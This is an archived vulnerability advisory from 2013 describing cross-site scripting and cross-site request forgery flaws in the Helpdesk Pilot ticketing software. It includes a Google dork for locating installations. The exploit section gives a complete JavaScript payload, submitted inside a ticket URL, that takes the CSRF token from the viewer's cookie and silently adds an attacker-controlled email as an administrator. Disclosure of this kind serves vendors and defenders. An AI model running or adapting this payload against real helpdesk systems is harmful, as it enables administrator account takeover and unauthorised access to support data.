Helpdesk Pilot suffers from cross site request forgery and cross site scripting vulnerabilities.
b3f63e15a311dc4dce0ad866ae24105a0f4959127cb54a6f082142dade103910###########################################################
Ciaran McNally
Application: Helpdesk Pilot
http://www.helpdeskpilot.com/
Versions: All versions.
Platforms: Windows, Mac, Linux
Bug: XSS/CSRF Add Administrator
Exploitation: WEB
Date: 30 November 2013.
Author: Ciaran McNally
Web: http://makthepla.net/blog/=/helpdesk-pilot-add-admin
My Twitter: https://twitter.com/ciaranmak
Google Dork: intext:"powered by Helpdesk Pilot"
#######################################################################
1) Bug.
2) The exploit.
3) Fix.
###########################################################
Help desk software or your business...
###########################################################
======
1) Bug
======
If attacker can submit a ticket, he/she simply needs to include a malicious
Url within the the ticket.
Javascript injection then occurs via the Url that is incorrectly sanitized.
http://example.com/<script>prompt(1);</script>
###########################################################
===============
2) The "exploit"
===============
For a simple Proof of concept use the example above, you will see the
expected popup within the ticketing system once it's viewed.
To add an administrator use a malicious Url similar to the following...
(Make sure there are no spaces otherwise it won't be parsed correctly)
http://makthepla.net/
<script>$(document).ready(function(){$.ajax({type:"POST",url:"http://
[HOST]/staff/manage/staff/",data:"csrfmiddlewaretoken="+document.cookie.split('=')[1]+"&formtype=invite_staff&staff&first_name&last_name&email=[ATTACKER_MAIL]&bulk_emails&role=1&categories=1",success:function(data){alert("Admin-Added-POC");},error:function(data){alert("POC_FAILED");}})});</script>
where [HOST] is the location of the software
and [ATTACKER_MAIL] is the attacker's email.
Attacker will recieve a mail if it successfully executes to complete
admin addition.
The example above contains alerts simply for POC, this is the one used
in the video on my blog post.
#######################################################################
======
3) Fix
======
Was Reported to the vendors twice,
Fix in progress...
#######################################################################
--
maK :)
--
-------------------------------------------
*-maK-*
Redbrick Administrator 2013/2014
Redbrick Webmaster 2012/2013
Redbrick Events Officer 2011/2012
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed